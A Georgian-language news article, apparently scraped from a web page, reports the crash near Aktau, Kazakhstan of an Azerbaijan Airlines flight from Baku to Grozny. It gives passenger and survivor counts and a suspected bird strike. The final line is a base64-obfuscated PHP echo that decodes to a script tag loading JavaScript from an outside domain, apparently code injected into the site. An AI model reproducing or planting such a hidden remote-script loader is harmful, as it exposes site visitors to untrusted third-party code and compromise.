tube
ავერსი jaluzi

ბაქოდან გროზნოში მიმავალი თვითმფრინავი ყაზახეთის ქალაქ აქთაუში ჩამოვარდა. ინფორმაციას უცხოური მედიები ყაზახეთის საგანგებო სიტუაციების სამსახურზე დაყრდნობით ავრცელებენ. ინფორმაციას ყაზახური Tengrinews ადასტურებს.

ავიახომალდი Azerbaijan Airlines-ს ეკუთვნოდა. გროზნოს აეროპორტის ავიარეისების განრიგის მიხედვით J2 8243 ბაქოდან ჩეჩნეთში მოსკოვის დროით 8:20 საათზე უნდა ჩაფრენილიყო. რუსული გამოცემა „რია ნოვოსტის“ გროზნოს აეროპორტში განუცხადეს, რომ ბაქოდან მომავალი თვითმფრინავი ჩეჩნეთის დედაქალაქში ნისლის გამო გადამისამართებული იყო მახაჩყალაში, შემდეგ კი აქთაუში.

აზერბაიჯანული გამოცემა Trend-ი Azerbaijan Airlines-ზე დაყრდნობით წერს, რომ ბორტზე 67 ადამიანი იმყოფებოდა, აქედან 5 ეკიპაჟის წევრი იყო. მათ შორის არ იყვნენ ბავშვები. ყაზახეთის ჯანდაცვის სამინისტროში კი აცხადებენ, რომ თვითმფრინავის ჩამოვარდნის შედეგად 6 ადამიანი გადარჩა და უკიდურესად მძიმე მდგომარეობაში არიან.

წინასწარი მონაცემებით, ინციდენტის მიზეზი ფრინველთა ჯგუფთან შეჯახება იყო. ყაზახეთის ტრანსპორტის სამინისტროში აცხადებენ, რომ ავიაკატასტროფასთან დაკავშირებით სპეციალური გამოძიება ჩატარდება.

131
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");